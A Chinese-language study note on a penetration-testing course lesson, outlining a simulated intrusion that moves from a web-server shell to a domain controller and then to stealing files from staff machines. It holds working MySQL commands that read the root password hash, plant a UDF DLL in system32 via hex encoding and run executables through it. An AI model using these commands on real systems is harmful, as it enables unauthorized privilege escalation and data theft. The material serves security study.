此笔记的原书来源于Micropoor前辈的Micro8,这里我仅对我感兴趣的地方做些自己的学习笔记,开头会注明来自哪几节课。
以下来自第8节课
由于师傅写的已经很清楚了,这里只做思路和其他介绍
模拟诉求攻击情况介绍
事件过程:拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情 况。
思路:拿到一个目标主站(win08 R2)shell,搜集信息,然后拿下第二台服务器,搜集信息,读取root,msf提权,拿到域控和跨段服务器权限后,跳到个人主机获取文件。
思路
主机信息,端口,任务列表(tasklist,注意重点敏感任务),账户搜集,重要路径搜集(为未来可能需要dump file做准备),数据库等密码搜集(为未来可能需要碰撞做准备),杀软搜集,管理员习惯等
拿到第二台服务器后,搜集完信息,发现有mysql服务,读取root信息
mysql的root hash:MySQL\MySQL Server 5.0\data\mysql\user.MYD
然后写入shell
在实际情况中,交互的shell下运行mysql -uroot -pxxx无法继续交互,需要参数e解决这个 问题。
mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
如果限制上传大小同样可以hex解决上传大小问题。
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"
利用msf执行命令,转发等,拿到域控权限后,得到跨段服务器权限,进而打到个人机进行文件获取
